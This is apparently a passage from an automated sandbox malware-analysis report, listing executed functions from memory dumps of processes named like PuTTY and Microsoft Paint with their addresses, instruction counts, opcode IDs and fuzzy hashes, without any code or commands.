                              • Opcode Fuzzy Hash: cceb4dd2797d54daf5f82da7e9d87be9702c556677e9fbcfe07ffb99d7d76cd8
                              • Instruction Fuzzy Hash: A7B0141153D405555345F714C55D1F573D0D75C1047500D35544DC1155FC047D414345
                              Function 00007FFF60F2C9FC Relevance: .0, Instructions: 5COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000032.00000002.1275026049.00007FFF60F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F20000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_50_2_7fff60f20000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 238a9142db9b4191badb25bc8bc5ce770a1be75e1444b91e43ef2f163b31e348
                              • Instruction ID: 6ec7278da6bfdac1549249c7735ae339cc20a487a05de05e6bd66e45a0cf541b
                              • Opcode Fuzzy Hash: 238a9142db9b4191badb25bc8bc5ce770a1be75e1444b91e43ef2f163b31e348
                              • Instruction Fuzzy Hash: E3A00210B1580F4A63C4A12C041A37A41CBE7B9281BA450B7590DCA2D7DD155C420616

                              Executed Functions

                              Function 00007FFF60F5B8C0 Relevance: .4, Instructions: 415COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F5A000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f5a000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 21646cb21217c05d0f6c6aa138d517b2273791158951ddd9112199beffa10f06
                              • Instruction ID: 7bf98ef8f09aaf35577224be723733109981e30421d1fa0299ef8593170319bc
                              • Opcode Fuzzy Hash: 21646cb21217c05d0f6c6aa138d517b2273791158951ddd9112199beffa10f06
                              • Instruction Fuzzy Hash: 62D1A421D1D7968EF767932498561B97BE0DF72311F7909B7C889CB2D3DD0D280A83A2
                              Function 00007FFF60F5C012 Relevance: .3, Instructions: 341COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F5A000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f5a000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0ebd0834681a13b23c28b30e522f9da955505ee625a235dbfa8230dec7ba68f9
                              • Instruction ID: be93748b54e2483523a9f8a56edaeccd18c0d9450554ac37c3c885650c632280
                              • Opcode Fuzzy Hash: 0ebd0834681a13b23c28b30e522f9da955505ee625a235dbfa8230dec7ba68f9
                              • Instruction Fuzzy Hash: 80B1C321D0C68A8EFB6B966488562B97BD0EF75300F7409BAD44ED73D3DD1C684A83D2
                              Function 00007FFF60F5CB29 Relevance: .2, Instructions: 190COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F5A000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f5a000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 924bbd7d843d4ed72f6a486ce09d40a7f47f98d31f67ee33478af4b1f977d497
                              • Instruction ID: 31f112d6f335e131c44d5ec092da7c99711e8dd1fd22a5508ff03fb5a6eac2e0
                              • Opcode Fuzzy Hash: 924bbd7d843d4ed72f6a486ce09d40a7f47f98d31f67ee33478af4b1f977d497
                              • Instruction Fuzzy Hash: 1B615351D0D6D68FEB67922498192653BE0DF72744F2908B6C48ECB2E3ED0D685A83D2
                              Function 00007FFF60F5CFD0 Relevance: 1.5, Strings: 1, Instructions: 239COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F5A000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f5a000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID: !K]H
                              • API String ID: 0-840409053
                              • Opcode ID: 1921d1c3b223d7a96f1d5c758a55b06153fe5fd34168ba3674ad9501a6e416b1
                              • Instruction ID: c52b47a62b0b32f312905516425c52e9cf881ad7a636ecd3325c8b44a6bd0050
                              • Opcode Fuzzy Hash: 1921d1c3b223d7a96f1d5c758a55b06153fe5fd34168ba3674ad9501a6e416b1
                              • Instruction Fuzzy Hash: 7B61A165E4C5078BFB9AE62C98523B933C1DFA5310F6401B9E50EC33D2FD1CA84A4292
                              Function 00007FFF60F5F23C Relevance: 1.4, Strings: 1, Instructions: 181COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F5A000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f5a000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID: :O_H
                              • API String ID: 0-2150663453
                              • Opcode ID: e7457a991f115c5d208f08ccdb1d1d9b0ddf08649e560121055a8665a2e02f39
                              • Instruction ID: 857a241a9485016cecb95735afdd6fe2fe13e32d749d86f52062752c48bc284f
                              • Opcode Fuzzy Hash: e7457a991f115c5d208f08ccdb1d1d9b0ddf08649e560121055a8665a2e02f39
                              • Instruction Fuzzy Hash: 7F515D25E4C4178BFB9AF22C94523B932C2DFA8311F7411B9E51EC33C6FD18A85B4292
                              Function 00007FFF60F5EAFF Relevance: 1.3, Strings: 1, Instructions: 99COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F5A000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f5a000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID: H
                              • API String ID: 0-2852464175
                              • Opcode ID: cf154d423fac723926b37f95ab750281a5dfb430a6a147a23e21132242ef5c39
                              • Instruction ID: 9146a1fdbe5976cf1b66a184a62e72b348fcc5167fc57d794c5471c904c06361
                              • Opcode Fuzzy Hash: cf154d423fac723926b37f95ab750281a5dfb430a6a147a23e21132242ef5c39
                              • Instruction Fuzzy Hash: D6315421E5D92BDAEAEEE768806167D63D1EFA8701FA50434E40FE33C2DD18BC418790
                              Function 00007FFF60F52918 Relevance: .8, Instructions: 817COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f50000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0229fc963d81d491e18a55f184e025236ac05975a64b9d16cd7d89151287bb1e
                              • Instruction ID: f4b2970aaa6d55c1372fe3e6502f7a52567239e41051c0673a2e8cbbdd06b8d7
                              • Opcode Fuzzy Hash: 0229fc963d81d491e18a55f184e025236ac05975a64b9d16cd7d89151287bb1e
                              • Instruction Fuzzy Hash: 9C522C21F1C9178BEB96AB28D0A16BD27D3EFA5312FA50835D00EC77C6DE2DAC424345
                              Function 00007FFF60F601CD Relevance: .3, Instructions: 345COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F5A000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f5a000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 451e90630cbe1b1a8c853d6f2a59998e0bd9572bc7fae9ee3f808f7901a9cae1
                              • Instruction ID: 0f30dd01410799fd7ead8d50adb67b37d9383970a77f3be52c6621e5cadd6370
                              • Opcode Fuzzy Hash: 451e90630cbe1b1a8c853d6f2a59998e0bd9572bc7fae9ee3f808f7901a9cae1
                              • Instruction Fuzzy Hash: 3FA1C122E2C5278AFB68A62C94562B973C1EF58710F7405B9F84EC33D3FD5CAD465282
                              Function 00007FFF60F5DC80 Relevance: .3, Instructions: 344COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F5A000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f5a000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 57bac95b1fc35bf2c9399d331f8f11f491c141cc861b5098f93be211f45656fa
                              • Instruction ID: 40dd43eddca6cd96ee7ccc9926aca53a1881ea705a9f9ac1ddc49c76b2ebeaa9
                              • Opcode Fuzzy Hash: 57bac95b1fc35bf2c9399d331f8f11f491c141cc861b5098f93be211f45656fa
                              • Instruction Fuzzy Hash: 97B12125F2D9178AEBAAF72C844637962D2EFA9315F651574D40EC33C6FC2CA84643C2
                              Function 00007FFF60F52B45 Relevance: .3, Instructions: 342COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f50000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 435dac821431cb7032c343095a1760f0a2397bc651d82fb4afa4678417e5e8b4
                              • Instruction ID: 4005b82c4d66e5d7fa3a92f53a58776717732594f88f75184ecaccb010151602
                              • Opcode Fuzzy Hash: 435dac821431cb7032c343095a1760f0a2397bc651d82fb4afa4678417e5e8b4
                              • Instruction Fuzzy Hash: D5C10C21F1C5078AFB9AA728D0A55BD27D3EFAA311FA50939D00EC77C6DE2DAC424345
                              Function 00007FFF60F5E8AB Relevance: .2, Instructions: 236COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F5A000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f5a000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 9c6a3ea51239570a08e48c4d7fa3db4523d4d48fc1e29a0dc1e88c165a6950dd
                              • Instruction ID: 38a684f08f4b6dfc0c19293538512387df99bceef352e82f99569f04734ca1cc
                              • Opcode Fuzzy Hash: 9c6a3ea51239570a08e48c4d7fa3db4523d4d48fc1e29a0dc1e88c165a6950dd
                              • Instruction Fuzzy Hash: 6F711F21E5C93BCAEAEAE76890616BD63D1FF68701BA10134D40EE33C2ED1CBC019791
                              Function 00007FFF60F53550 Relevance: .2, Instructions: 222COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f50000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: cba940b0811beec987d001335013f0088f23c2f98371bf7c8e1a4a52d9c353c6
                              • Instruction ID: a291276f9a1b60eb3ed6102db9ff5adc79fb1dce43aea65501b64471dffed6c7
                              • Opcode Fuzzy Hash: cba940b0811beec987d001335013f0088f23c2f98371bf7c8e1a4a52d9c353c6
                              • Instruction Fuzzy Hash: 2D518F71C2C5668AF77A166CF4824F9A7C1EF69360FA54078DCA9837C7AC1C6CA641C2
                              Function 00007FFF60F58635 Relevance: .2, Instructions: 199COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F56000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F56000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f56000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 445c6bdeb50eb2d888827bb280a7efc4d7446203fd67e190086df07fd7fdefc8
                              • Instruction ID: 8ab31dd580989207e5fb572e7f9d6a634ac0af46821260a2841dc130487a38b5
                              • Opcode Fuzzy Hash: 445c6bdeb50eb2d888827bb280a7efc4d7446203fd67e190086df07fd7fdefc8
                              • Instruction Fuzzy Hash: 0251D421A2E6878FF742A77898951B53BE1EF6A310F2801F6D449C72D3ED4C6C478392
                              Function 00007FFF60F56EC0 Relevance: .2, Instructions: 189COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F56000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F56000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f56000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4eb68301f916bfe0735cd67954df41e52c99f8d729493ea70b39b5a376a57a94
                              • Instruction ID: af40b192173842b19995afe96ccd4ecf5fc738253c73f4e1fdb69f9fc15913c2
                              • Opcode Fuzzy Hash: 4eb68301f916bfe0735cd67954df41e52c99f8d729493ea70b39b5a376a57a94
                              • Instruction Fuzzy Hash: 36516030918A4E8FEBA9DF28D8457A977D1FF68300F14822EE85DC3395DF3499458B82
                              Function 00007FFF60F5456A Relevance: .2, Instructions: 187COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f50000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: bd0407169f2e052e3cda540a5d9fd4f27930a05fb16f76c73bd1502ad7ecbea6
                              • Instruction ID: 931337578558fe2ccf9aba16cab4354dcf957908af8255c2fa4d26e1810f2f8c
                              • Opcode Fuzzy Hash: bd0407169f2e052e3cda540a5d9fd4f27930a05fb16f76c73bd1502ad7ecbea6
                              • Instruction Fuzzy Hash: 95514D71918A1C8FDB98DF58D845BE9BBF1FB59310F1082AAD00DE3252DF34A9858F81
                              Function 00007FFF60F57717 Relevance: .2, Instructions: 182COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F56000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F56000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f56000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0168aa9a5f674069875f6ee5ea44858dd72e0c8fceff0be7305735de5de086c8
                              • Instruction ID: 68a230cbb25d63b660601a84b5df080b11b5b59b8536b5900f29f6151eebe2a8
                              • Opcode Fuzzy Hash: 0168aa9a5f674069875f6ee5ea44858dd72e0c8fceff0be7305735de5de086c8
                              • Instruction Fuzzy Hash: 3E51A130608A4A8FEB69DF28E8453E977D1FF58301F14826ED84DC7395DF3899458B82
                              Function 00007FFF60F602EE Relevance: .2, Instructions: 181COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F5A000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f5a000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: fc579af26b72e42c9adc9492bb877beee1c302038043cbc9b87ab35d805c5bca
                              • Instruction ID: d077a24df5d210773d839c78b7c116ca9165e681a8043c492032b429cd376c16
                              • Opcode Fuzzy Hash: fc579af26b72e42c9adc9492bb877beee1c302038043cbc9b87ab35d805c5bca
                              • Instruction Fuzzy Hash: AB514121F2C91387EB68F62C98922BA22C5DFA4305F640579E90DC33D7FE58B90652C2
                              Function 00007FFF60F5457F Relevance: .2, Instructions: 179COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f50000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: de91f618111028d0046b2d8560ed169c9bba1ed3f632bac4470f8744ce7512ff
                              • Instruction ID: 7d10f2fba4cb9ec6152a29a272a286a500cabc623af201382df82b049a011d89
                              • Opcode Fuzzy Hash: de91f618111028d0046b2d8560ed169c9bba1ed3f632bac4470f8744ce7512ff
                              • Instruction Fuzzy Hash: 9A512E71918A1C8FDBA8DF58D845BE9BBF1FB58310F1082AAD40DE3255DF34A9858F81
                              Function 00007FFF60F5D294 Relevance: .2, Instructions: 173COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F5A000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f5a000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 99e42077ce605ca53c72a9288c7e9ba25ee58f5dd4d2c384aa00bfe2b9bc651b
                              • Instruction ID: 91c2473f9eea9865226f977e5a47c54a1b885185354df13efc811df48c7e02e2
                              • Opcode Fuzzy Hash: 99e42077ce605ca53c72a9288c7e9ba25ee58f5dd4d2c384aa00bfe2b9bc651b
                              • Instruction Fuzzy Hash: C241F621F1D90B8AEB59E72C98562B973C1EFA5301F640579D04EC3393EE28F8178782
                              Function 00007FFF60F52FEA Relevance: .2, Instructions: 161COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f50000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: eb3bd96922108689f4912c586741d7602f9646c1677d0c2c5cfa563fe643b69d
                              • Instruction ID: 0b83d23f73d87da9feb645f9fa1a4f60e8cf77f68687e4bed9afff7c11babb86
                              • Opcode Fuzzy Hash: eb3bd96922108689f4912c586741d7602f9646c1677d0c2c5cfa563fe643b69d
                              • Instruction Fuzzy Hash: 6D513161F1C51787FB5AAB6CD4A66BD36C2EFA5305FA40435E00DC37C6EE2CA9064346
                              Function 00007FFF60F522B5 Relevance: .2, Instructions: 159COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f50000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d7aaf674a6bc83e075bb184738b082f854172ce87ddb3fd44591a8d4167d32cf
                              • Instruction ID: 4b1fa20914598cfdc5dab6e1c20c4e94d22e7d3531db28348b1d559d4d915c12
                              • Opcode Fuzzy Hash: d7aaf674a6bc83e075bb184738b082f854172ce87ddb3fd44591a8d4167d32cf
                              • Instruction Fuzzy Hash: FD515E36F0C54786FBA6A668C4511BD27C2EFB6314F350639D54DC73C2DD2EAC564282
                              Function 00007FFF60F5AF4F Relevance: .2, Instructions: 150COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F5A000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f5a000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 891d66d271f3bd8c09052b8f15df854e8e813781c73988dea7aca2a4eddf3f75
                              • Instruction ID: df6271653c82dc6b76d13d5f9e0a614842b365637e8c21dcd1285e8e2ed7e092
                              • Opcode Fuzzy Hash: 891d66d271f3bd8c09052b8f15df854e8e813781c73988dea7aca2a4eddf3f75
                              • Instruction Fuzzy Hash: 17410D31A1891ACFEB95EB6CD4596BC77E1FF68301F640479D40EE33A2EE286C418741
                              Function 00007FFF60F53540 Relevance: .1, Instructions: 149COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f50000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c225515135592e440ffb53a90d124448e81d46f6bc2fe8b30d1a5b4af5f00f87
                              • Instruction ID: 9bf98a491e3342d471fa9bf4056dec568822131d575f531a45168d9d55559404
                              • Opcode Fuzzy Hash: c225515135592e440ffb53a90d124448e81d46f6bc2fe8b30d1a5b4af5f00f87
                              • Instruction Fuzzy Hash: 43419421C2C59699F379466CF4C24F9B3C1EB65720FA4107DDCA982BC7BC1C68A601C3
                              Function 00007FFF60F5A36E Relevance: .1, Instructions: 148COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F5A000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f5a000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 148d063a35f9af68ff0a4daa6095d27f384a69942ce65560de0671fb5eee902a
                              • Instruction ID: dc2e37966060c8c14059f73c0295228d17dc514b0ff76e9474188edaf0b64796
                              • Opcode Fuzzy Hash: 148d063a35f9af68ff0a4daa6095d27f384a69942ce65560de0671fb5eee902a
                              • Instruction Fuzzy Hash: 8E41C330E1C91ACFEB9AE7A894496B973D1EF64305F604079D50DC33E2EE2DA8568750
                              Function 00007FFF60F51B9F Relevance: .1, Instructions: 139COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f50000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 51f88a1cf3086a17b18cf3b21917ac208c227862f7c96fe00e3c3f675cfc0287
                              • Instruction ID: a2d98f26482208d7be19085eebd3709d9f4a4b9377dd048a77804ab25c8f425d
                              • Opcode Fuzzy Hash: 51f88a1cf3086a17b18cf3b21917ac208c227862f7c96fe00e3c3f675cfc0287
                              • Instruction Fuzzy Hash: 6C41A001F1C51B46E68A77B861661BE0AE39F96307FE14834E14ED7BCFDD6DAA020291
                              Function 00007FFF60F531F2 Relevance: .1, Instructions: 136COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f50000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 79efa35a9a5ec952b1c3ed945460c97bca2a1aaac8a1623e494002b285c9c72e
                              • Instruction ID: 4b8f2c06f6e03279b1638272fcfea207bf51a6122d0f3c13177b5a0d00de738d
                              • Opcode Fuzzy Hash: 79efa35a9a5ec952b1c3ed945460c97bca2a1aaac8a1623e494002b285c9c72e
                              • Instruction Fuzzy Hash: 8341DA21F1891ACBEB96AB2CC0A56B927D3EF99312BA50435D40DC37D6DE38A8429341
                              Function 00007FFF60F5EDF8 Relevance: .1, Instructions: 132COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F5A000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f5a000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 9e5a0b33be9e7d5de26cff8dcd99a69ca976a8d375c48f711dd29a1c732577c9
                              • Instruction ID: 4e03f32f1f1a50855908d5b0d5e303212d3c517720be79abc2115c0d5c3bf15e
                              • Opcode Fuzzy Hash: 9e5a0b33be9e7d5de26cff8dcd99a69ca976a8d375c48f711dd29a1c732577c9
                              • Instruction Fuzzy Hash: 81414B6188E3C24FE7A7863458256613FE1DF67214F2E41FBD588CB1E3EA4D180E8362
                              Function 00007FFF60F5ACD2 Relevance: .1, Instructions: 132COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F5A000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f5a000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d44737c7be511e231d852ca86bb8927b15334476fff81babba29d98fd987c65f
                              • Instruction ID: 93ed65d803b4e6cf3c5384637015f84946d6585964803b65b3be1aaafa745342
                              • Opcode Fuzzy Hash: d44737c7be511e231d852ca86bb8927b15334476fff81babba29d98fd987c65f
                              • Instruction Fuzzy Hash: CA413031A18D1A8FEB96EB6C84556BC77E1FFA8301F64017AD40DD7396EE25AC428740
                              Function 00007FFF60F5C705 Relevance: .1, Instructions: 130COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F5A000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f5a000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d93e342a3ba95f025994534e04679d5cef55852f5d5250749137255f2511e394
                              • Instruction ID: c2c0bd506c681f0628d8cb3ce210b9afcab01b46904af7d689d9adcf248a3d1d
                              • Opcode Fuzzy Hash: d93e342a3ba95f025994534e04679d5cef55852f5d5250749137255f2511e394
                              • Instruction Fuzzy Hash: C8412B61E0C80ACEEB96E72894562B877E1EF6D301F640975D40FD7792EE1868418BC1
                              Function 00007FFF60F606B6 Relevance: .1, Instructions: 129COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F5A000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f5a000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0c70025a519b2d12a238f04d288441e538305c07719ade651f7d09fb59081490
                              • Instruction ID: 3ef722a3ea65767bf941f7fddd6e8a99c9ed935eabb27b0355955cd68942481b
                              • Opcode Fuzzy Hash: 0c70025a519b2d12a238f04d288441e538305c07719ade651f7d09fb59081490
                              • Instruction Fuzzy Hash: EE41D322C2C6A28FEB56672488552BA2BD4DF52310F7900F5E44DCB2D3DD5D7C46D6C2
                              Function 00007FFF60F5E8C4 Relevance: .1, Instructions: 116COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F5A000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f5a000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 35d665009519e40e687f424f8fe8275dc1fb6781c7492ed22b53a93b0b089628
                              • Instruction ID: 019f3fafd3c7fea93a051b768b19fef997ac28d681d7c4ea47ebbeb1ea576e87
                              • Opcode Fuzzy Hash: 35d665009519e40e687f424f8fe8275dc1fb6781c7492ed22b53a93b0b089628
                              • Instruction Fuzzy Hash: 53311C31E1C93ACAEEEEA76880616BD67D1FF68701B650578D40ED33D2ED2CA8018791
                              Function 00007FFF60F5C521 Relevance: .1, Instructions: 110COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F5A000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f5a000_xdwdPutty.jbxd
